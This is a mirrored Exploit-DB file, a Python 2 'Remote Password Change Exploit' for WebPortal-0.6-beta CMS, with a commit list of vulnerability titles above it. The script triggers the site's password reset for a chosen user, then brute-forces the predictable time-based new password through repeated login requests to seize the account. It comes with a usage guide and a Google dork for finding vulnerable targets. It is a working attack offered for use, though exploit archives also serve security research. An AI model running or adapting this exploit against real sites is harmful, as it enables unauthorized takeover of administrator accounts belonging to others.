bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/4835.py
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

124 lines
9 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
#=================================================================================================#
# ____ __________ __ ____ __ #
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
# | | | \ | |/ \ \___| | /_____/ | || | #
# |___|___| /\__| /______ /\___ >__| |___||__| #
# \/\______| \/ \/ #
#=================================================================================================#
# This is a Public Exploit. #
# Date: 04/01/2008 [dd,mm,yyyy] #
# #
# !!!Happy New Year!!! #
# #
#=================================================================================================#
# WebPortal-0.6-beta Cms And Maybe Lower Remote Password Change Exploit #
# #
# Vendor: webportal.ivanoculmine.com #
# Severity: Highest #
# Author: The:Paradox #
#=================================================================================================#
# This exploit works with Magic Quotes = On #
#=================================================================================================#
# Proud To Be Italian. #
#=================================================================================================#
"""
Related Codes:
actions.php; line 14:
elseif ($_GET["action"] == "lostpass") {
$newpass = date("is").substr($user, 1, 2);
$result = db_query ("SELECT * FROM ".$prefix."users WHERE uname='".$_POST["user_name"]."';");
if (db_num_rows($result) > 0) {
$utente = db_fetch_array ($result);
db_query ("UPDATE ".$prefix."users SET pass='".md5($newpass)."' WHERE id='".$utente["id"]."';");
"""
#=================================================================================================#
# Proof Of Concept / Bug Explanation: #
# #
# This vulnerability is in actions.php and make us able to change the password of a victim user. #
# The page is a "Password Recovery Tool", that sends a new generated password to user's email. #
# It does an Update query (after a vulnerable SQL injection mq = OFF xD) setting as "pass" #
# the $newpass variable. Let's look the code. #
# #
# $newpass = date("is").substr($user, 1, 2); #
# #
# The newpassword is simply the date (minute+seconds) and the var $user taken trought #
# register_globals (we can let it empty). #
# So look at your clock, recover the password, and get administator rights ! =D #
# #
# If get the exactly server date is a problem for you, i have coded a little bruteforcer #
# (the new password is a 4 number sequence). #
# #
#=================================================================================================#
# Post Request to "Recover Password" : #
# #
# POST /webportal-0.6-beta/actions.php?action=lostpass user_name=[UserName] #
# #
#=================================================================================================#
# WebPortal cms is a very bugged platform. Some pages and functions don't work with the server #
# configuration Register_globals = Off , A LOT of sql injections with Magic Quotes = Off, #
# Full path disclosoures ecc. #
# Whatever this one is the most critical ('cause works with Mq=ON). #
# Maybe I'll public a sql injection mq=Off. #
#=================================================================================================#
# Google Dork=> Realizzato utilizzando Web Portal #
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds. #
#=================================================================================================#
# Python Exploit Starts #
#=================================================================================================#
import httplib, urllib, sys
from string import replace
print "\n################################################"
print " WebPortal-0.6-beta Cms And Maybe Lower "
print " Remote Password Change Exploit "
print " Date Bruteforcer "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " python %s [Target] [Path] [Username] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /WebPortal/ Admin " % (sys.argv[0])
print " python %s www.host.com / Admin " % (sys.argv[0])
print " "
print " "
print "################################################\n"
if len(sys.argv)<=3: sys.exit()
else: print "[.]Exploit Starting."
port = "80"
target = sys.argv[1]
path = sys.argv[2]
username = sys.argv[3]
#Resetting Password
conn = httplib.HTTPConnection(target,port)
conn.request("POST", path + "actions.php?action=lostpass", urllib.urlencode({'user_name': username}), {"Accept": "text/plain","Content-Type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Resetting Password -->",response.status, response.reason
conn.close()
#If 404 error: die.
if response.status == 404:
sys.exit("[-]Unable to reset Password. Failed, Exiting.")
#Let's Brute.
print "[.]Bruteforcer Starts. This may take long time."
for i in range(10000,19999):
conn = httplib.HTTPConnection(target,port)
conn.request("POST", path + "actions.php", urllib.urlencode({'uname': username,'pass': replace(str(i), "1", "", 1),"action" : "login"}), {"Accept": "text/plain","Content-Type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
header = response.getheader("location")
if header.find("index.php?error=not_logged") == -1:
sys.exit("\n\n[+]Gotcha! Password is: " + replace(str(i), "1", "", 1) + "\n\n-=Paradox Got This One=-\n")
print "[-]Not Found. Exploit Failed."
# milw0rm.com [2008-01-04]
Reference in a new issue View git blame Copy permalink